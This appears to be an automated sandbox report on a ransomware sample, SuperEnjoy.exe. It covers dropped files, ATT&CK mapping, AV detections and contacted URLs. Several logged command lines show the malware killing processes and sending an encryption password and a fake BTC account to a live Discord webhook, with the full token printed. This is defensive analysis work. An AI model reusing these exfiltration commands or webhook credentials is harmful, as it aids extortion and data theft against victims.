Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknownProcess created: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe 'C:\Windows\Temp\1810.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe 'C:\Windows\Temp\1810.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_003C81F7
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_003D4C03
Source: DiscordSendWebhook.exe, 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp, DiscordSendWebhook.exe, 0000000D.00000002.229491053.0000000000425000.00000002.00020000.sdmp, DiscordSendWebhook.exe, 00000012.00000000.231860968.0000000000AF5000.00000002.00020000.sdmp, DiscordSendWebhook.exe.14.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DiscordSendWebhook.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039886B cpuid 5_2_0039886B
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_003A50D7
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003B2230 GetUserNameW,5_2_003B2230
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_003A418A
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040559A GetVersionExW,GetVersionExW,1_2_0040559A
Source: DiscordSendWebhook.exeBinary or memory string: WIN_81
Source: DiscordSendWebhook.exeBinary or memory string: WIN_XP
Source: DiscordSendWebhook.exeBinary or memory string: WIN_XPe
Source: DiscordSendWebhook.exeBinary or memory string: WIN_VISTA
Source: DiscordSendWebhook.exeBinary or memory string: WIN_7
Source: DiscordSendWebhook.exeBinary or memory string: WIN_8
Source: DiscordSendWebhook.exe.14.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_003E6596
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_003E6A5A
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AB6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_00AB6596
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AB6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_00AB6A5A

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools2Input Capture21System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScripting1Valid Accounts2Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsNative API1Scheduled Task/Job1Valid Accounts2Scripting1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture21Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Access Token Manipulation21Obfuscated Files or Information2NTDSSystem Information Discovery27Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsScheduled Task/Job1Network Logon ScriptProcess Injection12Software Packing1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonScheduled Task/Job1File Deletion1Cached Domain CredentialsSecurity Software Discovery141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading121DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion3/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 349595 Sample: SuperEnjoy.exe Startdate: 06/02/2021 Architecture: WINDOWS Score: 80 57 Multi AV Scanner detection for dropped file 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Obfuscated command line found 2->61 63 2 other signatures 2->63 8 SuperEnjoy.exe 10 2->8         started        12 SuperEnjoy.exe 2->12         started        process3 dnsIp4 45 C:\Users\user\AppData\Local\...\aescrypt.exe, PE32 8->45 dropped 47 C:\Users\user\...\DiscordSendWebhook.exe, PE32 8->47 dropped 69 Detected unpacking (overwrites its own PE header) 8->69 15 cmd.exe 3 3 8->15         started        55 192.168.2.1 unknown unknown 12->55 49 C:\Windows\Temp\1810.tmp\aescrypt.exe, PE32 12->49 dropped 51 C:\Windows\Temp\...\DiscordSendWebhook.exe, PE32 12->51 dropped 18 cmd.exe 12->18         started        file5 signatures6 process7 file8 71 Obfuscated command line found 15->71 21 DiscordSendWebhook.exe 1 15->21         started        25 cmd.exe 15->25         started        27 DiscordSendWebhook.exe 1 15->27         started        35 9 other processes 15->35 43 C:\Windows\System32\config\...\cryptormsg.hta, HTML 18->43 dropped 73 Creates files in the system32 config directory 18->73 29 DiscordSendWebhook.exe 18->29         started        31 conhost.exe 18->31         started        33 attrib.exe 18->33         started        37 7 other processes 18->37 signatures9 process10 dnsIp11 53 discord.com 162.159.128.233, 443, 49727, 49729 CLOUDFLARENETUS United States 21->53 65 Binary is likely a compiled AutoIt script file 21->65 67 Obfuscated command line found 25->67 39 cmd.exe 25->39         started        41 findstr.exe 25->41         started        signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SuperEnjoy.exe36%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe8%ReversingLabs
C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exe21%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exe21%ReversingLabsWin32.Packed.Generic
C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe8%MetadefenderBrowse
C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe8%ReversingLabs
C:\Windows\Temp\1810.tmp\aescrypt.exe21%MetadefenderBrowse
C:\Windows\Temp\1810.tmp\aescrypt.exe21%ReversingLabsWin32.Packed.Generic

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
14.0.SuperEnjoy.exe.400000.0.unpack100%AviraHEUR/AGEN.1135103Download File
1.0.SuperEnjoy.exe.400000.0.unpack100%AviraHEUR/AGEN.1135103Download File

Domains

SourceDetectionScannerLabelLink
discord.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.mercadolivre.com.br/0%URL Reputationsafe
http://www.mercadolivre.com.br/0%URL Reputationsafe
http://www.mercadolivre.com.br/0%URL Reputationsafe
http://www.mercadolivre.com.br/0%URL Reputationsafe
http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
http://www.dailymail.co.uk/0%URL Reputationsafe
http://www.dailymail.co.uk/0%URL Reputationsafe
http://www.dailymail.co.uk/0%URL Reputationsafe
http://www.dailymail.co.uk/0%URL Reputationsafe
https://discord.com/api/webhooks/800%Avira URL Cloudsafe
https://discord.com/0%URL Reputationsafe
https://discord.com/0%URL Reputationsafe
https://discord.com/0%URL Reputationsafe
https://discord.com/0%URL Reputationsafe
http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://%s.com0%URL Reputationsafe
http://%s.com0%URL Reputationsafe
http://%s.com0%URL Reputationsafe
http://%s.com0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
http://it.search.dada.net/favicon.ico0%URL Reputationsafe
http://it.search.dada.net/favicon.ico0%URL Reputationsafe
http://it.search.dada.net/favicon.ico0%URL Reputationsafe
http://it.search.dada.net/favicon.ico0%URL Reputationsafe
http://search.hanafos.com/favicon.ico0%URL Reputationsafe
http://search.hanafos.com/favicon.ico0%URL Reputationsafe
http://search.hanafos.com/favicon.ico0%URL Reputationsafe
http://search.hanafos.com/favicon.ico0%URL Reputationsafe
http://www.phoenix125.com/DiscordAvatar.jpg0%Avira URL Cloudsafe
http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
http://www.abril.com.br/favicon.ico0%URL Reputationsafe
http://www.abril.com.br/favicon.ico0%URL Reputationsafe
http://www.abril.com.br/favicon.ico0%URL Reputationsafe
http://www.abril.com.br/favicon.ico0%URL Reputationsafe
http://Webhook1URL.com0%Avira URL Cloudsafe
http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
http://buscar.ozu.es/0%Avira URL Cloudsafe
http://busca.igbusca.com.br/0%URL Reputationsafe
http://busca.igbusca.com.br/0%URL Reputationsafe
http://busca.igbusca.com.br/0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://search.auction.co.kr/0%URL Reputationsafe
http://search.auction.co.kr/0%URL Reputationsafe
http://search.auction.co.kr/0%URL Reputationsafe
http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
https://discord.com/#0%Avira URL Cloudsafe
http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
http://google.pchome.com.tw/0%URL Reputationsafe
http://google.pchome.com.tw/0%URL Reputationsafe
http://google.pchome.com.tw/0%URL Reputationsafe
http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
http://www.gmarket.co.kr/0%URL Reputationsafe
http://www.gmarket.co.kr/0%URL Reputationsafe
http://www.gmarket.co.kr/0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://searchresults.news.com.au/0%URL Reputationsafe
http://searchresults.news.com.au/0%URL Reputationsafe
http://searchresults.news.com.au/0%URL Reputationsafe
https://discord.com/B0%Avira URL Cloudsafe
http://www.asharqalawsat.com/0%URL Reputationsafe
http://www.asharqalawsat.com/0%URL Reputationsafe
http://www.asharqalawsat.com/0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.128.233
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://search.chol.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
    		high
    http://www.mercadolivre.com.br/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.merlin.com.pl/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://search.ebay.de/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
      		high
      http://www.mtv.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
        		high
        http://www.rambler.ru/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
          		high
          http://www.nifty.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
            		high
            http://www.dailymail.co.uk/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www3.fnac.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
              		high
              http://buscar.ya.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                		high
                http://search.yahoo.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                  		high
                  https://discord.com/api/webhooks/80DiscordSendWebhook.exe, 0000000D.00000002.229811564.00000000016E0000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000002.229827440.00000000016E9000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.sogou.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersmshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                      		high
                      http://asp.usatoday.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                        		high
                        http://fr.search.yahoo.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                          		high
                          http://rover.ebay.commshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                            		high
                            http://in.search.yahoo.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                              		high
                              http://img.shopzilla.com/shopzilla/shopzilla.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                		high
                                http://search.ebay.in/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                  		high
                                  http://image.excite.co.jp/jp/favicon/lep.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleasemshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://%s.commshta.exe, 0000000A.00000002.676013549.000000000A930000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  http://msk.afisha.ru/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                    		high
                                    https://discordapp.com/api/webhooks/123456789012345678/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSDiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.zhongyicts.com.cnmshta.exe, 0000000A.00000002.674261524.00000000086D6000.00000002.00000001.sdmp, mshta.exe, 0000001D.00000002.673796991.00000000062D6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://busca.igbusca.com.br//app/static/images/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://search.rediff.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.ya.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.etmall.com.tw/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://it.search.dada.net/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://search.naver.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.google.ru/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                              		high
                                              http://search.hanafos.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.phoenix125.com/DiscordAvatar.jpgDiscordSendWebhook.exe, 00000005.00000002.212957274.0000000001304000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000005.00000003.211824013.00000000011E7000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227632700.000000000184D000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://cgi.search.biglobe.ne.jp/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.abril.com.br/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://search.daum.net/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                		high
                                                http://Webhook1URL.comDiscordSendWebhook.exe, 0000000D.00000003.229166020.0000000001751000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.242559047.000000000171E000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000003.237090886.0000000001705000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://search.naver.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://search.msn.co.jp/results.aspx?q=mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.clarin.com/favicon.icomshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://buscar.ozu.es/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://kr.search.yahoo.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://search.about.com/mshta.exe, 0000000A.00000002.677178645.000000000AA23000.00000002.00000001.sdmpfalse
                                                        		high
